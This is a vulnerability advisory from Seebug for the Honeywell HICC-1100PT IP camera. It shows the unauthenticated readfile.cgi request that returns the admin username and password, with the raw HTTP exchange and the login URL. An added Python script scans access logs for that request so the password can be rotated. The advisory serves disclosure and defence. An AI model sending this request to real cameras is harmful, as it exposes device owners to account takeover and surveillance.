Honeywell IP-Camera HICC-1100PT - Credentials Disclosure

2016-08-23T00:00:00
ID SSV:92326
Type seebug
Reporter Lucifer
Modified 2016-08-23T00:00:00

Description

Simply go to the following URL: http://host:port/cgi-bin/readfile.cgi?query=ADMINID

It should return JavaScript variables that contain the credentials and other configuration values:

```
var Adm_ID="admin";
var Adm_Pass1="admin";
var Adm_Pass2="admin";
var Language="en";
var Logoff_Time="0";
```

Request:

```
GET /cgi-bin/readfile.cgi?query=ADMINID HTTP/1.1
Host: host:port
Connection: close
```

Response:

```
HTTP/1.0 200 OK
Connection: close
Content-type: text/html

var Adm_ID="admin";
var Adm_Pass1="admin";
var Adm_Pass2="admin";
var Language="en";
var Logoff_Time="0";
```

Login @ http://host:port/cgi-bin/chklogin.cgi
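
One way to check access logs for reads of this endpoint, added here as an example and not part of the original advisory. It assumes a reverse proxy in front of the camera writes Combined Log Format; the function names and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumption: a reverse proxy in front of the camera writes Combined Log Format.
LOG_RE = re.compile(
    r'(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [23/Aug/2016:10:01:02 +0000] "GET /cgi-bin/readfile.cgi?query=ADMINID HTTP/1.1" 200 112',
    '198.51.100.7 - - [23/Aug/2016:10:01:09 +0000] "POST /cgi-bin/chklogin.cgi HTTP/1.1" 200 540',
    '203.0.113.20 - - [23/Aug/2016:11:15:40 +0000] "GET /cgi-bin/readfile.cgi?x=1&query=%41DMINID HTTP/1.1" 403 0',
    '192.0.2.15 - - [23/Aug/2016:12:00:00 +0000] "GET /cgi-bin/readfile.cgi?query=EXAMPLE HTTP/1.1" 200 30',
]

def is_adminid_read(target):
    """True when the request target is readfile.cgi with query=ADMINID."""
    parts = urlsplit(target)
    # Case-insensitive on purpose: better to over-flag than to miss a variant.
    if not unquote(parts.path).lower().endswith('/cgi-bin/readfile.cgi'):
        return False
    # parse_qsl percent-decodes names and values, so %41DMINID is normalised.
    return any(
        name.lower() == 'query' and value.strip().upper() == 'ADMINID'
        for name, value in parse_qsl(parts.query, keep_blank_values=True)
    )

def find_disclosures(lines):
    """Return (source, timestamp, status, likely_disclosed) for each match."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_adminid_read(m['target']):
            continue
        status = int(m['status'])
        # A 200 means the device answered, so the credentials were likely exposed.
        hits.append((m['src'], m['ts'], status, status == 200))
    return hits

if __name__ == '__main__':
    for src, ts, status, disclosed in find_disclosures(SAMPLE_LOG):
        action = 'rotate the admin password' if disclosed else 'blocked or failed'
        print(f'{ts} {src} status={status}: {action}')
```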